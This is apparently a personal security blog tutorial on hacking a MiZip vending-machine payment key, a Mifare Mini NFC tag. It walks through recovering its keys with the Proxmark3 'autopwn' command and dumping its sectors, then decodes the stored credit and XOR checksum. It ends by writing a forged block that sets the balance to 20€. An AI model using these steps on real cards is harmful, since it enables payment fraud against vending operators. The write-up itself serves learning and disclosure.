Disclaimer
PLEASE, DO NOT USE WHAT YOU LEARN HERE FOR MALICIOUS ACTS, ONLY DO IT FOR LEARNING PURPOSES / PENTEST !
You are here to learn, I don’t want to be involved in any malicious act.
Like Uncle Ben said : “With great power comes great responsibility”.
Introduction
Today, we will see how unsecure is a MiZip.
You will be surprised by the simplicity of the “attack” that we are gonna experiment.
I’ll try to simplify as much as I can, you are free to go further using your Google-fu.
Let’s begin with theory !
Context
2 weeks ago, I didn’t know anything about NFC !
The company where I am working as an Intern gave me a MiZip, a little key that you can reload with coins and then use to pay your snack / coffee.
I instantly asked myself : “How does it work ?”.
My only clue was the name of the key.
That’s how I started my investigation !
What’s NFC ?
The MiZip uses NFC to communicate with the vending machine… but what is it ?
NFC is a proximity-based wireless communication protocol.
It is limited by an extremly short range (less than 10cm) unlike WiFi or Bluetooth that are long range wireless comunication protocols.
You can find it on your smartphone, on your credit card, on the badge you use to open your building…
NFC is based on RFID, another older protocol used for the same purpose.
It is used to access office building, hotel rooms etc…
The main difference between these two protocols is their transmission ranges.
RFID can be used with a maximum distance of 460 meters depending on the power source.
NFC is newer and comes with some features missing on RFID like the possibility to hold multiple “cards” in one device (virtual cards).
You may ask yourself : “How does it work ?”.
The idea behind NFC is pretty simple !
There are two actors in an NFC transaction : the NFC tag and the NFC reader.
An NFC reader connects to one NFC tag at a time to exchange encrypted data.
The reader supplies the tag with electricity to get data.
A smartphone can act as a NFC tag (for wireless payment for example) and as a NFC reader (what we’ll use today).
Now that you have the theory behind NFC, let’s dig into the MiZip.
What is a MiZip ?
Name | MiZip |
Tag Type | Mifare Mini |
Block Size | 16 byte |
Number of Sectors | 5 |
Number of Blocks | 20 |
There are many NFC manufacturers, the most known is Mifare from NXP Semiconductors.
The most common tag from Mifare is the Mifare Classic (the one we will hack today), but there are also Mifare Plus, Mifare Ultralight (broken af) and the Mifare DESFire (still secured today, using 3DES).
The Classic use a security protocol called CRYPTO1 (which have been broken in 2008 š) made by NXP itself.
The tag is used to store an ID, but it can also store data !
For example, the ID can be used by a transport company to verify if somebody is allowed to travel and the data can store the contract (it has been the case in the London Underground).
A tag stores hexadecimal values in a very precise way.
Values are lined up in sectors composed by many blocks.
The “Mi” in MiZip stands for Mini because it contains a Mifare Mini, which is basically the same as the Classic but “smaller”.
Here you’ll find a comparaison between these tags.
How is the Mifare Mini protected ?
As I said, the Mifare Mini is a small Mifare Classic.
Each sector of a MIFARE Classic card has two authentication keys: key A and key B.
These two keys together with access conditions are stored in the last block of each sector (the so-called sector trailer).
If we find a way to retrieve keyA or keyB, we’ll be able to read and write on the MiZip !
Well, I think that we have enough theory now, let’s hack the MiZip !
I’ll try to find what is stored in it.
Hacking time !
How to communicate with the MiZip ?
Well, this would be interesting to see if we can read what’s in the MiZip when it communicates with the reader !
My research first led me to a free Android app called MCT (Mifare Classic Tools).
It can be used to read, analyze and write an NFC tag.
If your smartphone is compatible with NFC, just put the MiZip on the back of it and a popup will appear.
You’ll then be able to interact with the NFC tag.
here’s what it looks like
We are now capable to interract with the MiZip.
Let’s see if we can read what’s contained in each sector.
Just tap on “Read Tag” and you’ll see this screen :
Here, you have the choice between 3 wordlists containing known keys.
However, they will not work (they didn’t on mine).
To find your keys, you will need to bruteforce them with something more powerful.
Here comes the Proxmark3 !
The Proxmark3 is a hardware tool for RFID & NFC security analysis.
It allows users to read, write, analyze, clone and bruteforce the majority of RFID and NFC cards.
You can buy one for 40ā¬ on aliexpress.
Here is the GitHub you will need to consult to setup your proxmark3.
Once it is ready, plug it on your PC and put your MiZip on it like on the picture above !
Now let’s use the Proxmark script to bruteforce the keys.
Today, we’ll act like script kiddies so we are gonna use the “autopwn” command.
This will test every known attack against the Mifare Mini.
Use the following command :
hf mf autopwn --mini
The result will be stored in some files and keys will be shown during the process !
Here are my keys !
As you can see, the attack lasted 313 secondes / 5 minutes !
To do so, the Proxmark3 used a Hardnested attack.
Let’s read what’s in our MiZip !
We are now able to fully study our MiZip because we have its keys and a dump of each sector.
Values are stored in hexadecimal, I took each block and tried to understand what does it mean with what I know and some docs :
"blocks": {
"0": "CD1A1C74BF890400C808002000000017", --sector0
"1": "6200488849884A884B88000000000000",
"2": "00000000000000000000000000000000",
"3": "A0A1A2A3A4A5787788C1B4C132439EEF",
"4": "0100003808008001000100000000B102", --sector1
"5": "01000001000080010001000000008001",
"6": "AA020000000000000000000000000000",
"7": "C408465144FF78778830ED584949C455",
"8": "00CB02C9000000000000000000000050", --sector2
"9": "00670265000000000000000000000051",
"10": "55510000000000000000000000000000",
"11": "666FD5435F35787788116F9354E42E35",
"12": "00000000000000000000000000000000", --sector3
"13": "00000000000000000000000000000001",
"14": "55010000000000000000000000000000",
"15": "2F685DDBE11378778800B639DE6C4ADA",
"16": "00000000000000000000000000000000", --sector4
"17": "00000000000000000000000000000001",
"18": "55010000000000000000000000000000",
"19": "FC60AB5B898A78778800AC67EA3D3189"
}
First informations :
- The first 4 bytes (
CD1A1C74
) represent the ID of the tag. - Blocks 3, 7, 11, 15 and 19 contains keyA and keyB separated with 4 bytes called Access Bytes.
As you can see, the first keyA (
A1A2A3A4A5
) is very easy to guess.
Now, let’s focus on the third sector.
My MiZip contained 6,15ā¬ when I dumped it.
If you look at block number 9, it is possible to retrieve this value.
6702
-> 0267
when you convert it from little endianess, which gives 615 in decimal.
To verify this, I added 1ā¬ in my MiZip using my vending machine and checked the value again.
This means that my credits are stored on the MiZip !
The next byte represents the checksum (result of a XOR operation between 67 and 02).
On block 9, I also have 51
which is a counter.
It is used to avoid NFC cloning.
What we found :
6702
is the amount of credit in little-endianess, if you convert (0267) from hex to decimal, you’ll find 615 which means 6,15ā¬.65
is a checksum, the result of a xor operation between67
and02
.51
is a counter, if you look closely, the value is repeated on block number 10.
Well, if we modify 6702
with the value we want and append it the right checksum, we should be able to create credits ! šµ
Bonus : overwriting block number 9
I wanted to know if it is possible to overwrite the ninth block with another value.
Let’s say that I want 20ā¬ on my MiZip, I should write :
00D007D7000000000000000000000051
To do so, with the proxmark3, I typed the following command :
hf mf wrbl -b -k <2nd sector keyB> -d <block to write>
… and this worked.
š Achievement unlocked š : I became a big rat !
Because I wear a white hat, I didn’t use this
Conclusion
As you can see, this attack is simple to reproduce !
Today, we hacked a MiZip but we could have aimed another card. That’s why you gotta be careful with yours.
My goal is to show you how easy it is for an attacker to play with RFID/NFC tags.
From scratch, only a few hours allowed me to understand how to hack it.
I’m sorry if I made mistakes in my explanations and I would be pleased if you tell me what to correct if you find some !
Some sources
https://github.com/RfidResearchGroup/proxmark3 (this dude is the RFID god)
https://en.wikipedia.org/wiki/Near-field_communication
https://hackmethod.com/hacking-mifare-rfid/?v=11aedd0e4327
https://jurocknsail.github.io/yncrea-rfid/06_mifare-classic-1k-hacking/